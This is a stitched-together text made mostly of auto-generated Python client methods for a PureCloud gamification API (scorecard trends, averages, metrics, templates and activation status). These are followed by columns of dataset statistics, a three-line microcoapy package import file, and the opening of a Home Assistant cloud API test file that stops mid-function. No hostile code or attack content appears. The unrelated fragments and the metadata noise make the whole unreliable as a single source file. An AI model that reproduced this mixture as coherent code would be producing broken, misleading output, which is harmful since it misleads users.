This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_user_values_trends(user_id, start_workday, end_workday, callback=callback_function)
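>>>
>>> # Synchronous usage sketch; the user id, dates, and time zone below are placeholders:
>>> values_trend = api.get_gamification_scorecards_user_values_trends("user-id", "2021-01-01", "2021-01-31", time_zone="UTC")
>>> pprint(values_trend)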
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_id: (required)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str time_zone: Timezone for the workday. Defaults to UTC
:return: WorkdayValuesTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id', 'start_workday', 'end_workday', 'time_zone']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_user_values_trends" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_gamification_scorecards_user_values_trends`")
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_user_values_trends`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_user_values_trends`")
resource_path = '/api/v2/gamification/scorecards/users/{userId}/values/trends'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'time_zone' in params:
query_params['timeZone'] = params['time_zone']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayValuesTrend',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_users_points_average(self, filter_type, filter_id, workday, **kwargs):
"""
Workday average points by target group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_users_points_average(filter_type, filter_id, workday, callback=callback_function)
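>>>
>>> # Synchronous usage sketch; the filter type, filter id, and workday below are placeholders:
>>> averages = api.get_gamification_scorecards_users_points_average("Division", "division-id", "2021-01-15")
>>> pprint(averages)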
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter_type: Filter type for the query request. (required)
:param str filter_id: ID for the filter type. (required)
:param date workday: The target workday. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:return: SingleWorkdayAveragePoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter_type', 'filter_id', 'workday']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_users_points_average" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filter_type' is set
if ('filter_type' not in params) or (params['filter_type'] is None):
raise ValueError("Missing the required parameter `filter_type` when calling `get_gamification_scorecards_users_points_average`")
# verify the required parameter 'filter_id' is set
if ('filter_id' not in params) or (params['filter_id'] is None):
raise ValueError("Missing the required parameter `filter_id` when calling `get_gamification_scorecards_users_points_average`")
# verify the required parameter 'workday' is set
if ('workday' not in params) or (params['workday'] is None):
raise ValueError("Missing the required parameter `workday` when calling `get_gamification_scorecards_users_points_average`")
resource_path = '/api/v2/gamification/scorecards/users/points/average'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter_type' in params:
query_params['filterType'] = params['filter_type']
if 'filter_id' in params:
query_params['filterId'] = params['filter_id']
if 'workday' in params:
query_params['workday'] = params['workday']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleWorkdayAveragePoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_users_values_average(self, filter_type, filter_id, workday, **kwargs):
"""
Workday average values by target group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_users_values_average(filter_type, filter_id, workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter_type: Filter type for the query request. (required)
:param str filter_id: ID for the filter type. For example, division Id (required)
:param date workday: The target workday. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str time_zone: Timezone for the workday. Defaults to UTC
:return: SingleWorkdayAverageValues
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter_type', 'filter_id', 'workday', 'time_zone']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_users_values_average" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filter_type' is set
if ('filter_type' not in params) or (params['filter_type'] is None):
raise ValueError("Missing the required parameter `filter_type` when calling `get_gamification_scorecards_users_values_average`")
# verify the required parameter 'filter_id' is set
if ('filter_id' not in params) or (params['filter_id'] is None):
raise ValueError("Missing the required parameter `filter_id` when calling `get_gamification_scorecards_users_values_average`")
# verify the required parameter 'workday' is set
if ('workday' not in params) or (params['workday'] is None):
raise ValueError("Missing the required parameter `workday` when calling `get_gamification_scorecards_users_values_average`")
resource_path = '/api/v2/gamification/scorecards/users/values/average'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter_type' in params:
query_params['filterType'] = params['filter_type']
if 'filter_id' in params:
query_params['filterId'] = params['filter_id']
if 'workday' in params:
query_params['workday'] = params['workday']
if 'time_zone' in params:
query_params['timeZone'] = params['time_zone']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleWorkdayAverageValues',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_users_values_trends(self, filter_type, filter_id, start_workday, end_workday, **kwargs):
"""
Values trend by target group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_users_values_trends(filter_type, filter_id, start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter_type: Filter type for the query request. (required)
:param str filter_id: ID for the filter type. (required)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str time_zone: Timezone for the workday. Defaults to UTC
:return: WorkdayValuesTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter_type', 'filter_id', 'start_workday', 'end_workday', 'time_zone']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_users_values_trends" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filter_type' is set
if ('filter_type' not in params) or (params['filter_type'] is None):
raise ValueError("Missing the required parameter `filter_type` when calling `get_gamification_scorecards_users_values_trends`")
# verify the required parameter 'filter_id' is set
if ('filter_id' not in params) or (params['filter_id'] is None):
raise ValueError("Missing the required parameter `filter_id` when calling `get_gamification_scorecards_users_values_trends`")
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_users_values_trends`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_users_values_trends`")
resource_path = '/api/v2/gamification/scorecards/users/values/trends'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter_type' in params:
query_params['filterType'] = params['filter_type']
if 'filter_id' in params:
query_params['filterId'] = params['filter_id']
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'time_zone' in params:
query_params['timeZone'] = params['time_zone']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayValuesTrend',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_values_average(self, workday, **kwargs):
"""
Average values of the requesting user's division
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_values_average(workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param date workday: The target workday. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str time_zone: Timezone for the workday. Defaults to UTC
:return: SingleWorkdayAverageValues
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workday', 'time_zone']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_values_average" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workday' is set
if ('workday' not in params) or (params['workday'] is None):
raise ValueError("Missing the required parameter `workday` when calling `get_gamification_scorecards_values_average`")
resource_path = '/api/v2/gamification/scorecards/values/average'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'workday' in params:
query_params['workday'] = params['workday']
if 'time_zone' in params:
query_params['timeZone'] = params['time_zone']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleWorkdayAverageValues',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_values_trends(self, start_workday, end_workday, **kwargs):
"""
Values trends of the requesting user or group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_values_trends(start_workday, end_workday, callback=callback_function)
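>>>
>>> # Synchronous usage sketch; the dates below are placeholders. Omitting filter_type
>>> # scopes the request to the requesting user, per the parameter notes below.
>>> values_trend = api.get_gamification_scorecards_values_trends("2021-01-01", "2021-01-31")
>>> pprint(values_trend)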
:param callback function: The callback function
for asynchronous request. (optional)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str filter_type: Filter type for the query request. If not set, then the request is for the requesting user.
:param str time_zone: Timezone for the workday. Defaults to UTC
:return: WorkdayValuesTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_workday', 'end_workday', 'filter_type', 'time_zone']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_values_trends" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_values_trends`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_values_trends`")
resource_path = '/api/v2/gamification/scorecards/values/trends'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter_type' in params:
query_params['filterType'] = params['filter_type']
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'time_zone' in params:
query_params['timeZone'] = params['time_zone']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayValuesTrend',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_status(self, **kwargs):
"""
Gamification activation status
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_status(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: GamificationStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_status" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/status'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GamificationStatus',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_template(self, template_id, **kwargs):
"""
Objective template by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_template(template_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str template_id: Template ID (required)
:return: ObjectiveTemplate
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['template_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'template_id' is set
if ('template_id' not in params) or (params['template_id'] is None):
raise ValueError("Missing the required parameter `template_id` when calling `get_gamification_template`")
resource_path = '/api/v2/gamification/templates/{templateId}'.replace('{format}', 'json')
path_params = {}
if 'template_id' in params:
path_params['templateId'] = params['template_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectiveTemplate',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_templates(self, **kwargs):
"""
All objective templates
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_templates(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: GetTemplatesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_templates" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/templates'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetTemplatesResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_gamification_metrics(self, body, **kwargs):
"""
Creates a gamified metric with a given metric definition and metric objective
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_gamification_metrics(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Metric body: Metric (required)
:return: Metric
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_gamification_metrics" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_gamification_metrics`")
resource_path = '/api/v2/gamification/metrics'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Metric',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_gamification_metric(self, metric_id, body, **kwargs):
"""
Updates a metric
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_gamification_metric(metric_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str metric_id: Metric ID (required)
:param Metric body: Metric (required)
:return: Metric
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['metric_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_gamification_metric" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'metric_id' is set
if ('metric_id' not in params) or (params['metric_id'] is None):
raise ValueError("Missing the required parameter `metric_id` when calling `put_gamification_metric`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `put_gamification_metric`")
resource_path = '/api/v2/gamification/metrics/{metricId}'.replace('{format}', 'json')
path_params = {}
if 'metric_id' in params:
path_params['metricId'] = params['metric_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Metric',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_gamification_profile(self, performance_profile_id, **kwargs):
"""
Updates a performance profile
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_gamification_profile(performance_profile_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str performance_profile_id: Performance Profile Id (required)
:param PerformanceProfile body: Performance profile
:return: PerformanceProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['performance_profile_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_gamification_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'performance_profile_id' is set
if ('performance_profile_id' not in params) or (params['performance_profile_id'] is None):
raise ValueError("Missing the required parameter `performance_profile_id` when calling `put_gamification_profile`")
resource_path = '/api/v2/gamification/profiles/{performanceProfileId}'.replace('{format}', 'json')
path_params = {}
if 'performance_profile_id' in params:
path_params['performanceProfileId'] = params['performance_profile_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PerformanceProfile',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_gamification_status(self, status, **kwargs):
"""
Update gamification activation status
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_gamification_status(status, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param GamificationStatus status: Gamification status (required)
:return: GamificationStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['status']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_gamification_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'status' is set
if ('status' not in params) or (params['status'] is None):
raise ValueError("Missing the required parameter `status` when calling `put_gamification_status`")
resource_path = '/api/v2/gamification/status'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'status' in params:
body_params = params['status']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GamificationStatus',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
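# --- Hedged usage sketch (not part of the generated client) ---------------
# The docstrings above describe a synchronous calling convention and an
# asynchronous one driven by a `callback` kwarg. The helper below is a minimal
# illustration of both, assuming `api` is an already-constructed instance of
# this gamification API class backed by an authenticated api_client; that
# setup is intentionally not shown here and the helper is illustrative only.
def _example_gamification_usage(api):
    """Illustrative only: call one gamification endpoint both ways."""
    from datetime import date, timedelta
    from pprint import pprint

    end_workday = date.today()
    start_workday = end_workday - timedelta(days=7)

    # Synchronous call: the deserialized WorkdayValuesTrend is returned directly.
    trend = api.get_gamification_scorecards_values_trends(
        start_workday, end_workday, time_zone='UTC')
    pprint(trend)

    # Asynchronous call: the callback receives the deserialized response and,
    # per the docstring, the method returns the request thread instead.
    def on_status(response):
        pprint(response)

    return api.get_gamification_status(callback=on_status)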
| 41.700774
| 161
| 0.566642
| 11,757
| 118,597
| 5.509569
| 0.024581
| 0.037792
| 0.021073
| 0.019946
| 0.957531
| 0.94921
| 0.941429
| 0.934636
| 0.922703
| 0.915432
| 0
| 0.001941
| 0.352614
| 118,597
| 2,843
| 162
| 41.715441
| 0.841739
| 0.26902
| 0
| 0.841965
| 0
| 0
| 0.21652
| 0.064614
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02324
| false
| 0
| 0.004648
| 0
| 0.051129
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e748de04723a8575b9a965c0fe6426c7e19cdad1
| 118
|
py
|
Python
|
microcoapy/__init__.py
|
ftylitak/microCoAPy
|
703f4c79d4cecf9da095cb6bc926f239800a219d
|
[
"Apache-2.0"
] | 37
|
2019-10-16T10:07:55.000Z
|
2022-02-07T15:25:26.000Z
|
microcoapy/__init__.py
|
ftylitak/microCoAPy
|
703f4c79d4cecf9da095cb6bc926f239800a219d
|
[
"Apache-2.0"
] | 6
|
2019-11-28T09:37:49.000Z
|
2022-02-04T11:45:14.000Z
|
microcoapy/__init__.py
|
ftylitak/microCoAPy
|
703f4c79d4cecf9da095cb6bc926f239800a219d
|
[
"Apache-2.0"
] | 7
|
2020-11-10T13:25:17.000Z
|
2022-02-03T10:22:50.000Z
|
from .microcoapy import Coap
from .coap_macros import COAP_CONTENT_FORMAT
from .coap_macros import COAP_RESPONSE_CODE
| 29.5
| 44
| 0.872881
| 18
| 118
| 5.388889
| 0.5
| 0.309278
| 0.28866
| 0.412371
| 0.494845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 118
| 3
| 45
| 39.333333
| 0.915094
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e79f23c0845b33b8672a9095174ea682adaa3cbd
| 11,328
|
py
|
Python
|
tests/components/cloud/test_http_api.py
|
cyrus19901/Homeassistant-updated
|
26ed3ac6187179739a8e0e98b4b7060272efb906
|
[
"Apache-2.0"
] | 1
|
2020-08-06T00:03:02.000Z
|
2020-08-06T00:03:02.000Z
|
tests/components/cloud/test_http_api.py
|
icovada/home-assistant
|
25e6d694e1acab5a870890e594d0bbd48fc80135
|
[
"Apache-2.0"
] | null | null | null |
tests/components/cloud/test_http_api.py
|
icovada/home-assistant
|
25e6d694e1acab5a870890e594d0bbd48fc80135
|
[
"Apache-2.0"
] | 1
|
2019-09-15T04:45:12.000Z
|
2019-09-15T04:45:12.000Z
|
"""Tests for the HTTP API for the cloud component."""
import asyncio
from unittest.mock import patch, MagicMock
import pytest
from homeassistant.bootstrap import async_setup_component
from homeassistant.components.cloud import DOMAIN, auth_api
@pytest.fixture
def cloud_client(hass, test_client):
"""Fixture that can fetch from the cloud client."""
hass.loop.run_until_complete(async_setup_component(hass, 'cloud', {
'cloud': {
'mode': 'development'
}
}))
return hass.loop.run_until_complete(test_client(hass.http.app))
@pytest.fixture
def mock_auth(cloud_client, hass):
"""Fixture to mock authentication."""
auth = hass.data[DOMAIN]['auth'] = MagicMock()
return auth
@pytest.fixture
def mock_cognito():
"""Mock warrant."""
with patch('homeassistant.components.cloud.auth_api._cognito') as mock_cog:
yield mock_cog()
@asyncio.coroutine
def test_account_view_no_account(cloud_client):
